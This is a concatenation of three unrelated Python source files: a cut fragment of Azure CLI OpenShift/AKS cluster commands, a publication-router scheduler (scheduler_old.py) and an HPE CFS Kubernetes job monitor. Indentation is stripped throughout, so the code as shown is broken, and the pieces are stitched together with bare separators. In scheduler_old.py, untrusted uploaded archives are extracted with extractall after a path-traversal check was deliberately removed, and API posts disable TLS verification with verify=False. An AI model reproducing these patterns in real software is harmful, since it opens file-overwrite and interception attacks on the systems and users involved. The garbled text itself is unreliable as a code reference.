default_router_profile = OpenShiftRouterProfile(name='default')
if vnet_peer is not None:
from msrestazure.tools import is_valid_resource_id, resource_id
if not is_valid_resource_id(vnet_peer):
vnet_peer = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network', type='virtualNetwork',
name=vnet_peer
)
if workspace_id is not None:
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(
enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
else:
monitor_profile = None
network_profile = NetworkProfile(
vnet_cidr=vnet_prefix, peer_vnet_id=vnet_peer)
osamc = OpenShiftManagedCluster(
location=location, tags=tags,
open_shift_version="v3.11",
network_profile=network_profile,
auth_profile=auth_profile,
agent_pool_profiles=agent_pool_profiles,
master_pool_profile=agent_master_pool_profile,
router_profiles=[default_router_profile],
monitor_profile=monitor_profile)
try:
# long_running_operation_timeout=300
result = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name=resource_group_name, resource_name=name, parameters=osamc)
result = LongRunningOperation(cmd.cli_ctx)(result)
instance = client.get(resource_group_name, name)
_ensure_osa_aad(cmd,
cmd.cli_ctx,
aad_client_app_id=osa_aad_identity.client_id,
aad_client_app_secret=osa_aad_identity.secret,
aad_tenant_id=osa_aad_identity.tenant_id, identifier=instance.public_hostname,
name=name, create=create_aad)
except CloudError as ex:
if "The resource type could not be found in the namespace 'Microsoft.ContainerService" in ex.message:
raise CLIError(
'Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
if "No registered resource provider found for location" in ex.message:
raise CLIError(
'Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
raise ex
def openshift_show(cmd, client, resource_group_name, name):
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
mc = client.get(resource_group_name, name)
return _remove_osa_nulls([mc])[0]
def openshift_scale(cmd, client, resource_group_name, name, compute_count, no_wait=False):
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
instance = client.get(resource_group_name, name)
# TODO: change this approach when we support multiple agent pools.
idx = 0
for i in range(len(instance.agent_pool_profiles)):
if instance.agent_pool_profiles[i].name.lower() == "compute":
idx = i
break
instance.agent_pool_profiles[idx].count = int(
compute_count) # pylint: disable=no-member
# null out the AAD profile and add manually the masterAP name because otherwise validation complains
instance.master_pool_profile.name = "master"
instance.auth_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def openshift_monitor_enable(cmd, client, resource_group_name, name, workspace_id, no_wait=False):
OpenShiftManagedClusterMonitorProfile = cmd.get_models('OpenShiftManagedClusterMonitorProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
instance = client.get(resource_group_name, name)
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(
enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def openshift_monitor_disable(cmd, client, resource_group_name, name, no_wait=False):
OpenShiftManagedClusterMonitorProfile = cmd.get_models('OpenShiftManagedClusterMonitorProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
instance = client.get(resource_group_name, name)
monitor_profile = OpenShiftManagedClusterMonitorProfile(
enabled=False, workspace_resource_id=None) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def _is_msi_cluster(managed_cluster):
return (managed_cluster and managed_cluster.identity and
(managed_cluster.identity.type.casefold() == "systemassigned" or
managed_cluster.identity.type.casefold() == "userassigned"))
def _put_managed_cluster_ensuring_permission(
cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
subscription_id,
resource_group_name,
name,
managed_cluster,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
need_grant_vnet_permission_to_cluster_identity,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
headers,
no_wait
):
# some addons require post cluster creation role assigment
need_post_creation_role_assignment = (monitoring_addon_enabled or
ingress_appgw_addon_enabled or
(enable_managed_identity and attach_acr) or
virtual_node_addon_enabled or
need_grant_vnet_permission_to_cluster_identity)
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
cluster = LongRunningOperation(cmd.cli_ctx)(client.begin_create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers))
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
_add_ingress_appgw_addon_role_assignment(cluster, cmd)
if virtual_node_addon_enabled:
_add_virtual_node_role_assignment(cmd, cluster, vnet_subnet_id)
if need_grant_vnet_permission_to_cluster_identity:
if not _create_role_assignment(cmd.cli_ctx, 'Network Contributor',
cluster.identity.principal_id, scope=vnet_subnet_id,
resolve_assignee=False):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
if enable_managed_identity and attach_acr:
# Attach ACR to cluster enabled managed identity
if cluster.identity_profile is None or \
cluster.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster is successfully created, but we failed to attach '
'acr to it, you can manually grant permission to the identity '
'named <ClUSTER_NAME>-agentpool in MC_ resource group to give '
'it permission to pull from ACR.')
else:
kubelet_identity_client_id = cluster.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
else:
cluster = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers)
return cluster
def _ensure_cluster_identity_permission_on_kubelet_identity(cli_ctx, cluster_identity_object_id, scope):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope.lower() != scope.lower():
continue
if not i.role_definition_id.lower().endswith(CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID):
continue
if i.principal_id.lower() != cluster_identity_object_id.lower():
continue
# already assigned
return
if not _add_role_assignment(cli_ctx, CONST_MANAGED_IDENTITY_OPERATOR_ROLE, cluster_identity_object_id,
is_service_principal=False, scope=scope):
raise UnauthorizedError('Could not grant Managed Identity Operator '
'permission to cluster identity at scope {}'.format(scope))
|
scheduler_old.py | '''
This is the application scheduler.
It defines scheduled tasks and runs them as per their defined schedule.
This scheduler is started and stopped when the app is started and stopped.
Unless RUN_SCHEDULE is set to False in the config. In which case it must be started manually / managed by supervisor.
It is presumed to run on one machine at present.
If scaling later requires having multiple machines, then this scheduler should only run on the machine that has access to
the relevant directories. There is a task that moves files from ftp user jail directories to tmp processing locations, and
this is the limitation - creating sftp accounts has to happen on one machine or across machines, but that would increase
attack surface for security vulnerability. So probably better to have only one machine open to sftp, and if necessary for
later scale the script that is called to move data from the sftp jails to processing locations could do so by round-robin
to multiple processing machines. The jper app config has settings for running this scheduler and what frequencies to run each
process, so it is just a case of installing jper on each machine but only setting the frequencies for the processes desired to
be scheduled on each given machine.
Or, if scheduled tasks themselves also need to be scaled up, the scheduler can continue to run on
all machines but some synchronisation would have to be added to that tasks were not run on every machine. Also, each machine
running the schedule would need access to any relevant directories.
'''
import schedule, time, os, shutil, requests, datetime, tarfile, zipfile, subprocess, getpass, uuid, json, csv
from threading import Thread
from octopus.core import app, initialise
from service import reports
from . import models
if app.config.get('DEEPGREEN_EZB_ROUTING', False):
from . import routing_deepgreen as routing
else:
from . import routing
# functions for the checkftp to unzip and move stuff up then zip again in incoming packages
def zip(src, dst):
zf = zipfile.ZipFile(dst, "w", zipfile.ZIP_DEFLATED)
abs_src = os.path.abspath(src)
for dirname, subdirs, files in os.walk(src):
for filename in files:
absname = os.path.abspath(os.path.join(dirname, filename))
arcname = absname[len(abs_src) + 1:]
zf.write(absname, arcname)
zf.close()
def extract(fl,path):
app.logger.debug('Extracting ' + fl)
try:
# TODO the tar method has not yet been tested...
tar = tarfile.open(fl)
# 2019-11-18 TD : add the actual path for extraction here
tar.extractall(path=path)
#tar.extractall()
tar.close()
app.logger.debug('Extracted tar ' + fl)
return True
except:
try:
with zipfile.ZipFile(fl) as zf:
# 2019-11-18 TD : replace the 'hand made' routine by the libary call
zf.extractall(path=path)
# 2019-11-18 TD : this loop apparently does not work with nested folder
# structures, so we discard it
# for member in zf.infolist():
# # Path traversal defense copied from
# # http://hg.python.org/cpython/file/tip/Lib/http/server.py#l789
# words = member.filename.split('/')
# for word in words[:-1]:
# drive, word = os.path.splitdrive(word)
# head, word = os.path.split(word)
# if word in (os.curdir, os.pardir, ''): continue
# path = os.path.join(path, word)
# zf.extract(member, path)
app.logger.debug('Extracted zip ' + fl)
return True
except Exception as e:
app.logger.error('Scheduler - Extraction could not be done for ' + fl + ' : "{x}"'.format(x=str(e)))
return False
def flatten(destination, depth=None):
if depth is None:
depth = destination
app.logger.debug('Flatten depth set ' + destination + ' ' + depth)
#
# 2019-11-18 TD : Introducing the '.xml' file as recursion stop.
# If an .xml file is found in a folder in the .zip file then this
# *is* a single publication to be separated from the enclosing .zip file
has_xml = False
for fl in os.listdir(depth):
if 'article_metadata.xml' in fl: # De Gruyter provides a second .xml sometimes, sigh.
os.remove(depth + '/' + fl)
continue
if not has_xml and '.xml' in fl:
app.logger.debug('Flatten ' + fl + ' found in folder')
has_xml = True
words = destination.split('/')
stem = words[-1] + '/' + os.path.splitext(fl)[0]
if not os.path.exists(destination + '/' + stem):
os.makedirs(destination + '/' + stem)
app.logger.debug('Flatten new ' + destination + '/' + stem + ' created')
# 2019-11-18 TD : end of recursion stop marker search
#
for fl in os.listdir(depth):
app.logger.debug('Flatten at ' + fl)
# 2019-11-18 TD : Additional check for 'has_xml' (the stop marker)
# if '.zip' in fl: # or '.tar' in fl:
if not has_xml and '.zip' in fl: # or '.tar' in fl:
app.logger.debug('Flatten ' + fl + ' is an archive')
extracted = extract(depth + '/' + fl, depth)
if extracted:
app.logger.debug('Flatten ' + fl + ' is extracted')
os.remove(depth + '/' + fl)
flatten(destination,depth)
# 2019-11-18 TD : Additional check for 'has_xml' (the stop marker)
# elif os.path.isdir(depth + '/' + fl):
elif os.path.isdir(depth + '/' + fl) and not has_xml:
app.logger.debug('Flatten ' + fl + ' is not a file, flattening')
flatten(destination, depth + '/' + fl)
else:
try:
# shutil.move(depth + '/' + fl, destination)
# 2019-11-18 TD : Some 'new' +stem dst place to move all the single pubs into
if has_xml and os.path.isdir(destination + '/' + stem):
shutil.move(depth + '/' + fl, destination + '/' + stem)
else:
shutil.move(depth + '/' + fl, destination)
except:
pass
# 2016-11-30 TD : routine to peak in flattened packages, looking for a .xml file floating around
def pkgformat(src):
# our first best guess...
### pkg_fmt = "https://datahub.deepgreen.org/FilesAndJATS"
pkg_fmt = "unknown"
for fl in os.listdir(src):
app.logger.debug('Pkgformat at ' + fl)
if '.xml' in fl:
app.logger.debug('Pkgformat tries to open ' + src + '/' + fl)
try:
with open(src + '/' + fl, 'r') as f:
for line in f:
if "//NLM//DTD Journal " in line:
pkg_fmt = "https://datahub.deepgreen.org/FilesAndJATS"
break
elif "//NLM//DTD JATS " in line:
pkg_fmt = "https://datahub.deepgreen.org/FilesAndJATS"
break
elif "//RSC//DTD RSC " in line:
pkg_fmt = "https://datahub.deepgreen.org/FilesAndRSC"
break
except:
app.logger.info('Pkgformat could not open ' + src + '/' + fl)
# there shall only be *one* .xml as per package
break
app.logger.debug('Pkgformat returns ' + pkg_fmt)
return pkg_fmt
#
# 2019-07-17 TD : change target of the move operation to the big dg_storage for all deliveries
#
def moveftp():
try:
# # move any files in the jail of ftp users into the temp directory for later processing
# tmpdir = app.config.get('TMP_DIR','/tmp')
pubstoredir = app.config.get('PUBSTOREDIR', '/data/dg_storage')
userdir = app.config.get('USERDIR', '/home/sftpusers')
userdirs = os.listdir(userdir)
app.logger.info("Scheduler - from FTP folders found " + str(len(userdirs)) + " user directories")
for dir in userdirs:
# 2019-07-30 TD : One more loop over possible subfolders of the user
# Please note: They are *exclusively* created by 'createFTPuser.sh'
# At least, there should be the (old) 'xfer' folder
founditems = False
for xfer in os.listdir(userdir + '/' + dir):
# if len(os.listdir(userdir + '/' + dir + '/xfer')):
if len(os.listdir(userdir + '/' + dir + '/' + xfer)):
founditems = True
# for thisitem in os.listdir(userdir + '/' + dir + '/xfer'):
for thisitem in os.listdir(userdir + '/' + dir + '/' + xfer):
app.logger.info('Scheduler - moving file ' + thisitem + ' for Account:' + dir)
fl = os.path.dirname(os.path.abspath(__file__)) + '/models/moveFTPfiles.sh'
try:
newowner = getpass.getuser()
except:
newowner = 'green'
uniqueid = uuid.uuid4().hex
# targetdir = tmpdir + '/' + dir
# uniquedir = tmpdir + '/' + dir + '/' + uniqueid
targetdir = pubstoredir + '/' + dir
# 2019-07-17 TD : introduce a new directory that will indicate pending items
pendingdir = pubstoredir + '/' + dir + '/pending'
uniquedir = pubstoredir + '/' + dir + '/' + uniqueid
# moveitem = userdir + '/' + dir + '/xfer/' + thisitem
moveitem = userdir + '/' + dir + '/' + xfer + '/' + thisitem
#print(" ".join(['sudo', fl, dir, newowner, targetdir, uniqueid, uniquedir, moveitem, pendingdir]))
subprocess.call( [ 'sudo', fl, dir, newowner, targetdir, uniqueid, uniquedir, moveitem, pendingdir ] )
if founditems is False:
app.logger.debug('Scheduler - found nothing to move for Account:' + dir)
except:
app.logger.error("Scheduler - move from FTP failed")
if app.config.get('MOVEFTP_SCHEDULE',10) != 0:
schedule.every(app.config.get('MOVEFTP_SCHEDULE',10)).minutes.do(moveftp)
#
# 2019-07-17 TD : process the big delivery/publisher dg_storage for all pending items
#
def copyftp():
try:
# copy any files in the big delivery/publisher dg_storage into the temp dir for processing
tmpdir = app.config.get('TMP_DIR','/tmp')
maxtransacts = app.config.get('MAX_TMPDIR_TRANSACTS_PER_ACC',99)
pubstoredir = app.config.get('PUBSTOREDIR','/data/dg_storage')
pubstoredirs = os.listdir(pubstoredir)
app.logger.info("Scheduler - from DG-STORAGE folders found " + str(len(pubstoredirs)) + " user directories")
for dir in pubstoredirs:
# 2019-07-29 TD : check if 'tmpdir/dir' exists at all
if os.path.exists(tmpdir + '/' + dir) is False:
os.makedirs(tmpdir + '/' + dir)
# 2019-07-17 TD : limit temp dir to 100 transactions per account
if len(os.listdir(tmpdir + '/' + dir)) > maxtransacts:
app.logger.info('Scheduler - skipping this copy process because len(transactions)>' + str(maxtransacts) + ' in temp directory for Account:' + dir)
continue
if len(os.listdir(pubstoredir + '/' + dir + '/pending')):
for transact in os.listdir(pubstoredir + '/' + dir + '/pending'):
if len(os.listdir(tmpdir + '/' + dir)) > maxtransacts:
break
app.logger.info('Scheduler - copying folder of transaction ' + transact + ' for Account:' + dir)
src = pubstoredir + '/' + dir + '/pending/' + transact
dst = tmpdir + '/' + dir + '/' + transact
# subprocess.call( [ 'cp -R', ...] )
shutil.rmtree(dst, ignore_errors=True) # target MUST NOT exist!
shutil.copytree(src, dst)
try:
os.remove(src) # try to take the pending symlink away
except Exception as e:
app.logger.error("Scheduler - failed to delete pending entry: '{x}'".format(x=str(e)))
else:
app.logger.debug('Scheduler - currently, nothing to copy for Account:' + dir)
except:
app.logger.error("Scheduler - copy from DG-STORAGE failed")
if app.config.get('COPYFTP_SCHEDULE',10) != 0:
schedule.every(app.config.get('COPYFTP_SCHEDULE',10)).minutes.do(copyftp)
def processftp():
try:
# list all directories in the temp dir - one for each ftp user for whom files have been moved from their jail
userdir = app.config.get('TMP_DIR', '/tmp')
userdirs = os.listdir(userdir)
app.logger.debug("Scheduler - processing for FTP found " + str(len(userdirs)) + " temp user directories")
for dir in userdirs:
# configure for sending anything for the user of this dir
apiurl = app.config['API_URL']
acc = models.Account().pull(dir)
if acc is None:
continue
apiurl += '?api_key=' + acc.data['api_key']
# there is a uuid dir for each item moved in a given operation from the user jail
for udir in os.listdir(userdir + '/' + dir):
thisdir = userdir + '/' + dir + '/' + udir
app.logger.debug('Scheduler - processing ' + thisdir + ' for Account:' + dir)
for xpub in os.listdir(thisdir):
pub = xpub
# should be a dir per publication notification - that is what they are told to provide
# and at this point there should just be one pub in here, whether it be a file or directory or archive
# if just a file, even an archive, dump it into a directory so it can be zipped easily
if os.path.isfile(thisdir + '/' + pub):
nf = uuid.uuid4().hex
os.makedirs(thisdir + '/' + nf)
shutil.move(thisdir + '/' + pub, thisdir + '/' + nf + '/')
pub = nf
# by now this should look like this:
# /Incoming/ftptmp/<useruuid>/<transactionuuid>/<uploadeddirORuuiddir>/<thingthatwasuploaded>
# they should provide a directory of files or a zip, but it could just be one file
# but we don't know the hierarchy of the content, so we have to unpack and flatten it all
# unzip and pull all docs to the top level then zip again. Should be jats file at top now
flatten(thisdir + '/' + pub)
# 2019-11-18 TD : 'flatten' has been modified to process bulk deliveries
# (i.e. more then one pub per zip file!) as well.
# If it is bulk, there maybe a lot of zip files, and
# we need a loop:
pdir = thisdir
if os.path.isdir(thisdir + '/' + pub + '/' + pub):
pdir = thisdir + '/' + pub + '/' + pub
#
for singlepub in os.listdir(pdir):
# 2016-11-30 TD : Since there are (at least!?) 2 formats now available, we have to find out
## 2019-11-18 TD : original path without loop where zip file is packed
## from source folder "thisdir + '/' + pub"
## pkg_fmt = pkgformat(thisdir + '/' + pub)
## #
## pkg = thisdir + '/' + pub + '.zip'
## zip(thisdir + '/' + pub, pkg)
##
pkg_fmt = pkgformat(pdir + '/' + singlepub)
#
pkg = pdir + '/' + singlepub + '.zip'
zip(pdir + '/' + singlepub, pkg)
# create a notification and send to the API to join the unroutednotification index
notification = {
"content": { "packaging_format": pkg_fmt }
#"content": {"packaging_format": "https://datahub.deepgreen.org/FilesAndJATS"}
## "content": {"packaging_format": "https://pubrouter.jisc.ac.uk/FilesAndJATS"}
}
files = [
("metadata", ("metadata.json", json.dumps(notification), "application/json")),
("content", ("content.zip", open(pkg, "rb"), "application/zip"))
]
app.logger.debug('Scheduler - processing POSTing ' + pkg + ' ' + json.dumps(notification))
resp = requests.post(apiurl, files=files, verify=False)
if str(resp.status_code).startswith('4') or str(resp.status_code).startswith('5'):
app.logger.error('Scheduler - processing completed with POST failure to ' + apiurl + ' - ' + str(resp.status_code) + ' - ' + resp.text)
else:
app.logger.info('Scheduler - processing completed with POST to ' + apiurl + ' - ' + str(resp.status_code))
shutil.rmtree(userdir + '/' + dir + '/' + udir, ignore_errors=True) # 2019-12-02 TD : kill "udir" folder no matter what status
except Exception as e:
raise
app.logger.error('Scheduler - failed scheduled process for FTP temp directories: "{x}"'.format(x=str(e)))
if app.config.get('PROCESSFTP_SCHEDULE', 10) != 0:
schedule.every(app.config.get('PROCESSFTP_SCHEDULE', 10)).minutes.do(processftp)
def checkunrouted():
urobjids = []
robjids = []
counter = 0
limit = app.config.get('CHECKUNROUTED_SCHEDULE',10) * 5
# 2019-06-13 TD : to cope with mass deliveries, we have to limit the next loop
# (factor 10 times the time to the next call seems reasonable...)
try:
app.logger.debug("Scheduler - check for unrouted notifications")
# query the service.models.unroutednotification index
# returns a list of unrouted notification from the last three up to four months
counter = 0
for obj in models.UnroutedNotification.scroll():
counter += 1
res = routing.route(obj)
if res:
robjids.append(obj.id)
else:
urobjids.append(obj.id)
# 2019-06-13 TD : to cope with mass deliveries, we have to limit
# the loop over the unrouted notifs
if counter >= limit:
break
# 2017-06-06 TD : replace str() by .format() string interpolation
app.logger.debug("Scheduler - routing sent {cnt} notification(s) for routing".format(cnt=counter))
if app.config.get("DELETE_ROUTED", False) and len(robjids) > 0:
# 2017-06-06 TD : replace str() by .format() string interpolation
app.logger.debug("Scheduler - routing deleting {x} of {cnt} unrouted notification(s) that have been processed and routed".format(x=len(robjids),cnt=counter))
models.UnroutedNotification.bulk_delete(robjids)
# 2017-05-17 TD :
time.sleep(2) # 2 seconds grace time
if app.config.get("DELETE_UNROUTED", False) and len(urobjids) > 0:
# 2017-06-06 TD : replace str() by .format() string interpolation
app.logger.debug("Scheduler - routing deleting {x} of {cnt} unrouted notifications that have been processed and were unrouted".format(x=len(urobjids),cnt=counter))
models.UnroutedNotification.bulk_delete(urobjids)
# 2017-05-17 TD :
time.sleep(2) # again, 2 seconds grace
except Exception as e:
app.logger.error("Scheduler - Failed scheduled check for unrouted notifications: cnt={cnt}, len(robjids)={a}, len(urobjids)={b}".format(cnt=counter,a=len(robjids),b=len(urobjids)))
app.logger.error("Scheduler - Failed scheduled check for unrouted notifications: '{x}'".format(x=str(e)))
if app.config.get('CHECKUNROUTED_SCHEDULE',10) != 0:
schedule.every(app.config.get('CHECKUNROUTED_SCHEDULE',10)).minutes.do(checkunrouted)
def monthly_reporting():
# python schedule does not actually handle months, so this will run every day and check whether the current month has rolled over or not
try:
app.logger.debug('Scheduler - Running monthly reporting')
# create / update a monthly deliveries by institution report
# it should have the columns HEI, Jan, Feb...
# and rows are HEI names then count for each month
# finally ends with sum total (total of all numbers above)
# and unique total (total unique objects accessed - some unis may have accessed the same one)
# query the retrieval index to see which institutions have retrieved content from the router in the last month
month = datetime.datetime.now().strftime("%B")[0:3]
year = str(datetime.datetime.now().year)
app.logger.debug('Scheduler - checking monthly reporting for ' + month + ' ' + year)
reportsdir = app.config.get('REPORTSDIR','/home/green/jper_reports')
if not os.path.exists(reportsdir): os.makedirs(reportsdir)
monthtracker = reportsdir + '/monthtracker.cfg'
try:
lm = open(monthtracker,'r')
lastmonth = lm.read().strip('\n')
lm.close()
except:
lm = open(monthtracker,'w')
lm.close()
lastmonth = ''
if lastmonth != month:
app.logger.debug('Scheduler - updating monthly report of notifications delivered to institutions')
lmm = open(monthtracker,'w')
lmm.write(month)
lmm.close()
# get the month number that we are reporting on
tmth = datetime.datetime.utcnow().month - 1
# if the month is zero, it means the year just rolled over
if tmth == 0:
tmth = 12
lastyear = int(year) - 1
frm = str(lastyear) + "-" + str(tmth) + "-01T00:00:00Z"
to_date = str(year) + "-01-01T00:00:00Z"
else:
mnthstr = str(tmth) if tmth > 9 else "0" + str(tmth)
nexmnth = str(tmth + 1) if tmth + 1 > 9 else "0" + str(tmth + 1)
frm = str(year) + "-" + mnthstr + "-01T00:00:00Z"
if tmth == 12:
nextyear = int(year) + 1
to_date = str(nextyear) + "-01-01T00:00:00Z"
else:
to_date = str(year) + "-" + nexmnth + "-01T00:00:00Z"
# specify the file that we're going to output to
reportfile = reportsdir + '/monthly_notifications_to_institutions_' + year + '.csv'
# run the delivery report
reports.delivery_report(frm, to_date, reportfile)
# necessary tasks for other monthly reporting could be defined here
# reporting that has to run more regularly could be defined as different reporting methods altogether
# and controlled with different settings in the config
except Exception as e:
app.logger.error("Scheduler - Failed scheduled reporting job: '{x}'".format(x=str(e)))
if app.config.get('SCHEDULE_MONTHLY_REPORTING',False):
schedule.every().day.at("00:05").do(monthly_reporting)
def delete_old_routed():
app.logger.info('Scheduler - checking for old routed indexes to delete')
try:
# each day send a delete to the index name that is beyond the range of those to keep
# so only actually has an effect on the first day of each month - other days in the month it is sending a delete to an index that is already gone
# index names look like routed201601
# so read from config how many months to keep, and add 1 to it
# so if in March, and keep is 3, then it becomes 4
keep = app.config.get('SCHEDULE_KEEP_ROUTED_MONTHS',3) + 1
year = datetime.datetime.utcnow().year
# subtracting the keep gives us a month of -1 if now March
month = datetime.datetime.utcnow().month - keep
if month < 1:
# so roll back the year, and set the month to 11 (if now March)
year = year - 1
month = 12 + month
# so idx would look like routed201511 if now March - meaning we would keep Dec, Jan, and Feb (and Mar currently in use of course)
idx = 'routed' + str(year) + str(month)
addr = app.config['ELASTIC_SEARCH_HOST'] + '/' + app.config['ELASTIC_SEARCH_INDEX'] + '/' + idx
app.logger.debug('Scheduler - sending delete to ' + addr)
# send the delete - at the start of a month this would delete an index. Other days it will just fail
requests.delete(addr)
except Exception as e:
app.logger.error("Scheduler - Failed monthly routed index deletion: '{x}'".format(x=str(e)))
if app.config.get('SCHEDULE_DELETE_OLD_ROUTED',False):
schedule.every().day.at("03:00").do(delete_old_routed)
def cheep():
app.logger.debug("Scheduled cheep")
print("Scheduled cheep")
#schedule.every(1).minutes.do(cheep)
def run():
while True:
schedule.run_pending()
time.sleep(1)
def go():
thread = Thread(target = run)
thread.daemon = True
thread.start()
if __name__ == "__main__":
initialise()
print("starting scheduler")
app.logger.debug("Scheduler - starting up directly in own process.")
run()
|
job_events.py | # Copyright 2019-2021 Hewlett Packard Enterprise Development LP
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# (MIT License)
"""
Functions for handling Job Events related to CFS.
"""
import logging
import threading
import time
from requests.exceptions import HTTPError
from kubernetes import config, client
from kubernetes.client.rest import ApiException
from kubernetes.config.config_exception import ConfigException
import cray.cfs.operator.cfs.sessions as cfs_sessions
try:
config.load_incluster_config()
except ConfigException: # pragma: no cover
config.load_kube_config() # Development
_api_client = client.ApiClient()
k8s_jobs = client.BatchV1Api(_api_client)
LOGGER = logging.getLogger('cray.cfs.operator.events.job_events')
class CFSJobMonitor:
def __init__(self, env):
self.namespace = env['RESOURCE_NAMESPACE']
self.sessions = {}
def _sync_sessions(self):
# Load incomplete and unmonitored sessions
session_list = cfs_sessions.get_sessions()
for session in session_list:
session_status = session.get('status', {}).get('session', {})
if session['name'] not in self.sessions and \
session_status.get('job') and \
not session_status.get('status') == 'complete':
self.add_session(session)
def _run(self): # pragma: no cover
intervals = 0
while True:
try:
self.monitor_sessions()
if intervals >= 10:
# Periodically check for out of sync sessions
self._sync_sessions()
intervals = 0
except Exception as e:
LOGGER.warning('Exception monitoring sessions: {}'.format(e))
intervals += 1
time.sleep(30)
def _run_cleanup(self): # pragma: no cover
while True:
try:
self.cleanup_jobs()
time.sleep(60*60)
except Exception as e:
LOGGER.warning('Exception running cleanup: {}'.format(e))
def run(self): # pragma: no cover
while True:
try:
self._sync_sessions()
except Exception as e:
LOGGER.warning('Exception during initial session sync: {}'.format(e))
time.sleep(30)
else:
break
threading.Thread(target=self._run).start()
threading.Thread(target=self._run_cleanup).start()
def monitor_sessions(self):
try:
completed_sessions = []
# Use list(keys()) rather than .items() so that other threads can edit dict
for name in list(self.sessions.keys()):
if self.session_complete(self.sessions[name]):
completed_sessions.append(name)
for name in completed_sessions:
self.remove_session(name)
except Exception as e:
LOGGER.error('Exception encountered while monitoring jobs: {}'.format(e))
def cleanup_jobs(self):
try:
jobs = self.get_jobs()
sessions = cfs_sessions.get_sessions()
session_jobs = self.get_session_jobs(sessions)
i = 0
for job in jobs:
if job not in session_jobs:
self.delete_job(job)
i += 1
if i:
LOGGER.info('Cleanup removed {} orphaned cfs jobs'.format(i))
except Exception as e:
LOGGER.warning('Exception encountered while cleaning jobs: {}'.format(e))
def add_session(self, session):
self.sessions[session['name']] = session
def remove_session(self, session_name):
self.sessions.pop(session_name, None)
def session_complete(self, session):
session_name = session['name']
if self._session_missing(session_name):
LOGGER.warning('Session {} was being monitored but can no longer be found')
return True
job_name = session['status']['session'].get('job')
if not job_name:
# This shouldn't be able to happen.
# Session jobs are only monitored if the job has been created.
LOGGER.warning('No job is specified for session {}. This is an invalid state.'.format(
session['name']))
return True
try:
job = k8s_jobs.read_namespaced_job(job_name, self.namespace)
except ApiException as e:
if getattr(e, 'status', None) == 404:
LOGGER.warning('Job was deleted before CFS could determine success.')
cfs_sessions.update_session_status(session_name, data={'status': 'complete',
'succeeded': 'unknown'})
return True
else:
LOGGER.warning("Unable to fetch Job=%s", job_name, e)
return False
session_status = session.get('status', {}).get('session', {})
if job.status.start_time and session_status.get('status') == 'pending':
LOGGER.info("EVENT: JobStart %s", session_name)
cfs_sessions.update_session_status(session_name, data={'status': 'running'})
# Set so that update_session_status is not called again for status
session_status['status'] = 'running'
